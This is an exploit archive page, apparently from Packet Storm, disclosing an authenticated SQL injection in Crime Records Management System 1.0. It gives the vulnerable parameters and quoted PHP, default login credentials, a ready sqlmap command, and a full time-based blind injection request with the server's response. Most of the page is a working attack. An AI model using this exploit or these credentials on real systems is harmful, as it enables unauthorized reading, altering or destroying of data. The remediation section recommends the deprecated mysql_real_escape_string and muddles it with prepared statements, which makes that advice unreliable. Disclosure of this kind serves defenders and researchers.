what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Crime Records Management System 1.0 SQL Injection

Crime Records Management System 1.0 SQL Injection
Posted Aug 18, 2021
Authored by Davide Taraschi

Crime Records Management System version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | aab3ec0698141d1863877cdc50d2978c56680677d5a902d7f0a76e715b07fdd6

Crime Records Management System 1.0 SQL Injection

Change Mirror Download
# Exploit Title: Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated)
# Date: 17/08/2021
# Exploit Author: Davide 't0rt3ll1n0' Taraschi
# Vendor Homepage: https://www.sourcecodester.com/users/osman-yahaya
# Software Link: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html
# Version: 1.0
# Testeted on: Linux (Ubuntu 20.04) using LAMPP

## Impact:
An authenticated user may be able to read data for which is not authorized, tamper with or destroy data, or possibly even read/write files or execute code on the database server.

## Description:
All four parameters passed via POST are vulnerable:
`fname` is vulnerable both to boolean-based blind and time-based blind SQLi
`oname` is vulnerable both to boolean-based blind and time-based blind SQLi
`username` is only vulnerable to time-based blind SQLi
`status` is vulnerable both to boolean-based blind and time-based blind SQLi

## Remediation:
Here is the vulnerable code:

if($status==''){
mysqli_query($dbcon,"update userlogin set surname='$fname', othernames='$oname' where staffid='$staffid'")or die(mysqli_error());
}
if(!empty($status)){
mysqli_query($dbcon,"update userlogin set surname='$fname',status='$status', othernames='$oname' where staffid='$staffid'")or die(mysqli_error());
}

As you can see the parameters described above are passed to the code without being checked, this lead to the SQLi.
To patch this vulnerability, i suggest to sanitize those variables via `mysql_real_escape_string()` before being passed to the prepared statement.

## Exploitation through sqlmap
1) Log into the application (you can try the default creds 1111:admin123)
2) Copy your PHPSESSID cookie
3) Launch the following command:
sqlmap --method POST -u http://$target/ghpolice/admin/savestaffedit.php --data="fname=&oname=&username=&status=" --batch --dbs --cookie="PHPSESSID=$phpsessid"
replacing $target with your actual target and $phpsessid with the cookie that you had copied before

## PoC:
Request:
POST /ghpolice/admin/savestaffedit.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/ghpolice/admin/user.php
Cookie: PHPSESSID=f7123ac759cd97868df0f363434c423f
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

fname=' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- &oname=&username=&status=

And after 5 seconds we got:

HTTP/1.1 200 OK
Date: Tue, 17 Aug 2021 14:28:59 GMT
Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1
X-Powered-By: PHP/7.4.22
Content-Length: 1074
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
etc...
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close